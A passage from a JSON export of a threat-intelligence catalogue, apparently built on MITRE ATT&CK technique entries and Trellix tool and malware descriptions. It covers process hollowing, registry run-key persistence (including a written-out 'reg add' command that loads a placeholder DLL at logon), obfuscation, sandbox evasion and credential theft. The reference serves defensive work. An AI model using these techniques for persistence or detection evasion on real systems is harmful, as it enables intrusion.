interfaces provide mechanisms to interact with and utilize various components of a victimized system.\n\nNative API functions (such as <code>NtCreateProcess</code>) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API <code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\n\nAdversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001).", "created_on": "2020-02-26T13:49:09.000Z", "name": "Native API"}, {"id": "a3d11f86-4429-4e16-8596-16df80008fa8", "category": "trellix-tool", "description": "Displays information that you can use to diagnose Domain Name System (DNS) infrastructure. Before using this tool, you should be familiar with how DNS works. The nslookup command-line tool is available only if you have installed the TCP/IP protocol.\r\n\r\nThe nslookup command-line tool has two modes: interactive and noninteractive.\r\n\r\nIf you need to look up only a single piece of data, we recommend using the non-interactive mode. For the first parameter, type the name or IP address of the computer that you want to look up. For the second parameter, type the name or IP address of a DNS name server. If you omit the second argument, nslookup uses the default DNS name server.\r\n\r\nIf you need to look up more than one piece of data, you can use interactive mode. Type a hyphen (-) for the first parameter and the name or IP address of a DNS name server for the second parameter. If you omit both parameters, the tool uses the default DNS name server. While using the interactive mode, you can:\r\n\r\nInterrupt interactive commands at any time, by pressing CTRL+B.\r\n\r\nExit, by typing exit.\r\n\r\nTreat a built-in command as a computer name, by preceding it with the escape character (\\). An unrecognized command is interpreted as a computer name.", "created_on": "2021-10-01T13:08:42.000Z", "name": "nslookup"}, {"id": "42174b22-12f9-4f94-995d-66e45f6829e1", "category": "mitre-attack-pattern", "description": "Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)\n\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)", "created_on": "2021-07-23T16:55:51.000Z", "name": "NTFS File Attributes"}, {"id": "c3b49fbe-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) ", "created_on": "2020-02-26T13:49:09.000Z", "name": "Obfuscated Files or Information"}, {"id": "0fc20fb9-fed3-4ee0-bd45-3ef70f4de07e", "category": "trellix-tool", "description": "OpenLibSys is an open-source hardware access library that provides user-mode applications with controlled access to low-level system resources through a kernel-mode driver. It enables operations such as reading/writing model-specific registers, MSRs, accessing I/O ports, and interacting with CPU and chipset hardware, and commonly used by system monitoring, overclocking, and diagnostic tools.", "created_on": "2026-04-08T16:17:18.000Z", "name": "OpenLibSys"}, {"id": "765b5f39-dc5a-4def-823d-b3cb5842f493", "category": "mitre-attack-pattern", "description": "Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)\n\nAdversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)\n Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)", "created_on": "2022-05-02T21:10:40.000Z", "name": "Password Managers"}, {"id": "03a54b3d-aa21-11eb-9477-02d538d9640e", "category": "trellix-tool", "description": "Microsoft's powershell scripting language is available by default from Windows 7 upwards and therefore provides stealth with that environment for launching attacks. Further, powershell has been made open-source and cross-platform with the advent of 'powershell core' in 2016.\r\n\r\nPowerShell provides full access to all Windows services including Microsoft COM (Component Object Model) and Microsoft Windows Management Instrumentation (WMI), while add-ins can easily be imported to include functionality for managing Active Directory, Exchange, etc.\r\n\r\nSome other features that make powershell an interesting choice for attackers include:\r\n - Ability to run code directly in memory with ease\r\n - Flexibility to encode elements of a script in a multitude of ways\r\n - Full access to the Microsoft .Net framework\r\n - Ability to re-create the powershell framework binary using .Net framework dll's.\r\n - Logging and detecting behavior is difficult in older versions\r\n - Availability of a number of quality attack frameworks written in powershell.\r\n\r\nSource: Microsoft", "created_on": "2021-05-01T02:00:33.000Z", "name": "PowerShell"}, {"id": "e95190b8-2b7c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell's underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)", "created_on": "2020-11-20T22:08:25.000Z", "name": "PowerShell"}, {"id": "c4271b0f-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or <code>Get-Process</code> via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the <code>ps</code> command. Adversaries may also opt to enumerate processes via `/proc`. ESXi also supports use of the `ps` command, as well as `esxcli system process list`.(Citation: Sygnia ESXi Ransomware 2025)(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)", "created_on": "2020-02-26T13:49:10.000Z", "name": "Process Discovery"}, {"id": "beefee6e-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.  \n\nProcess hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as <code>CreateProcess</code>, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as <code>ZwUnmapViewOfSection</code> or <code>NtUnmapViewOfSection</code>  before being written to, realigned to the injected code, and resumed via <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. ", "created_on": "2020-12-03T03:00:48.000Z", "name": "Process Hollowing"}, {"id": "c4372cd0-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.", "created_on": "2020-02-26T13:49:10.000Z", "name": "Proxy"}, {"id": "c4b26b01-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\n\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", "created_on": "2020-02-26T13:49:11.000Z", "name": "Query Registry"}, {"id": "9cc8ce6a-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n\nRun keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: <code>reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup</code>. The startup folder path for all users is <code>C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp</code>.\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n\nPrograms listed in the load value of the registry key <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> run automatically for the currently logged-on user.\n\nBy default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", "created_on": "2020-11-20T03:00:57.000Z", "name": "Registry Run Keys / Startup Folder"}, {"id": "ef698bcd-ad7a-11ea-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. \n\nResource hijacking may take a number of different forms. For example, adversaries may:\n\n* Leverage compute resources in order to mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate SMS traffic for profit\n* Abuse cloud-based messaging services to send large quantities of spam messages\n\nIn some cases, adversaries may leverage multiple types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking 2023)", "created_on": "2020-06-13T13:36:50.000Z", "name": "Resource Hijacking"}, {"id": "53c8b6a9-3fe1-40c7-b413-58e2a01874ec", "category": "trellix-tool", "description": "RevStealer is a commercial Windows information stealer, sold since February 2026, that harvests browser credentials, cookies, cryptocurrency wallets, password-manager data, gaming and messaging accounts, VPN/FTP configurations, clipboard contents, screenshots, and files. Distributed via trojanized applications and game-cheat lures, it uses weighted anti-sandbox scoring, API/string obfuscation, VMProtect packing, and browser debugging to bypass Chrome App-Bound Encryption, exfiltrating AES-encrypted data over HTTP with Polygon blockchain smart contracts (EtherHiding) as C2 fallback before self-deleting. Tasked modules add wallet phishing, clipboard hijacking, reverse SOCKS5 proxying, and crypto mining.", "created_on": "2026-09-10T00:12:12.000Z", "name": "RevStealer"}, {"id": "bea4602e-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments) ", "created_on": "2020-12-03T03:00:48.000Z", "name": "Scheduled Task"}, {"id": "c3ec91d2-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)\n", "created_on": "2020-02-26T13:49:10.000Z", "name": "Screen Capture"}, {"id": "e90fcf19-2b7c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as cloud monitoring agents and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), <code>reg query</code> with [Reg](https://attack.mitre.org/software/S0075), <code>dir</code> with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.\n\nAdversaries may also utilize the [Cloud API](https://attack.mitre.org/techniques/T1059/009) to discover cloud-native security software installed on compute infrastructure, such as the AWS CloudWatch agent, Azure VM Agent, and Google Cloud Monitor agent. These agents  may collect  metrics and logs from the VM, which may be centrally aggregated in a cloud-based monitoring platform.", "created_on": "2020-11-20T22:08:25.000Z", "name": "Security Software Discovery"}, {"id": "398f4f07-acb7-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible.(Citation: Novetta Blockbuster) In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server, or on virtual machines hosted on ESXi infrastructure.(Citation: SecureWorks WannaCry Analysis)(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)\n\nThreat actors may also disable or stop service in cloud environments. For example, by leveraging the `DisableAPIServiceAccess` API in AWS, a threat actor may prevent the service from creating service-linked roles on new accounts in the AWS Organization.(Citation: Datadog Security Labs Cloud Persistence 2025)(Citation: AWS DisableAWSServiceAccess)", "created_on": "2020-06-12T14:15:53.000Z", "name": "Service Stop"}, {"id": "892534b7-6f7e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nSuch software may be deployed widely across the environment for configuration management or security reasons, such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072), and may allow adversaries broad access to infect devices or move laterally.\n\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).", "created_on": "2020-03-26T16:26:24.000Z", "name": "Software Discovery"}, {"id": "000cf478-cbbf-11ea-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\n\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)\n\nThere are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) Adversaries may also steal cookies by injecting malicious JavaScript content into websites or relying on [User Execution](https://attack.mitre.org/techniques/T1204) by tricking victims into running malicious JavaScript in their browser.(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)\n\nThere are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (e.g., [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)\n\nAfter an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.", "created_on": "2020-07-22T01:59:38.000Z", "name": "Steal Web Session Cookie"}, {"id": "c51abd5f-f924-4223-8ea0-e2c9a6938c12", "category": "trellix-tool", "description": "Svchost.exe (Service Host, or SvcHost) is a system process that can host from one or more Windows services in the Windows NT family of operating systems.[1] Svchost is essential in the implementation of shared service processes, where a number of services can share a process in order to reduce resource consumption.", "created_on": "2022-01-04T22:13:19.000Z", "name": "svchost.exe"}, {"id": "9ca75d59-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.", "created_on": "2020-11-20T03:00:57.000Z", "name": "Symmetric Cryptography"}, {"id": "3c5609a5-3683-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks  into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Once executed, malware may also use [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`.\n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)", "created_on": "2020-12-04T22:51:24.000Z", "name": "System Checks"}, {"id": "c3f17bf6-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use this information to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. This behavior is distinct from [Local Storage Discovery](https://attack.mitre.org/techniques/T1680) which is an adversary's discovery of local drive, disks and/or volumes.\n\nTools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. Adversaries may leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. <code>show version</code>).(Citation: US-CERT-TA18-106A) On ESXi servers, threat actors may gather system information from various esxcli utilities, such as `system hostname get` and `system version get`.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: Varonis)\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)\n\n[System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques) ", "created_on": "2020-02-26T13:49:10.000Z", "name": "System Information Discovery"}, {"id": "30fdd461-d0a2-11eb-9d72-02d538d9640e", "category": "trellix-tool", "description": "The Taskkill utility is a built-in Windows operating system tool executed through the command-line interface to terminate one or more running tasks or processes. Users can stop these active operations by specifying either the unique process ID or the specific image name associated with the program.", "created_on": "2021-06-19T02:00:59.000Z", "name": "Taskkill"}, {"id": "38ff925e-3c26-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.\n\nAdversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny.(Citation: Deloitte Environment Awareness)\n\nBenign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://attack.mitre.org/software/S0097)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://attack.mitre.org/techniques/T1106) functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)\n\nAdversaries may also 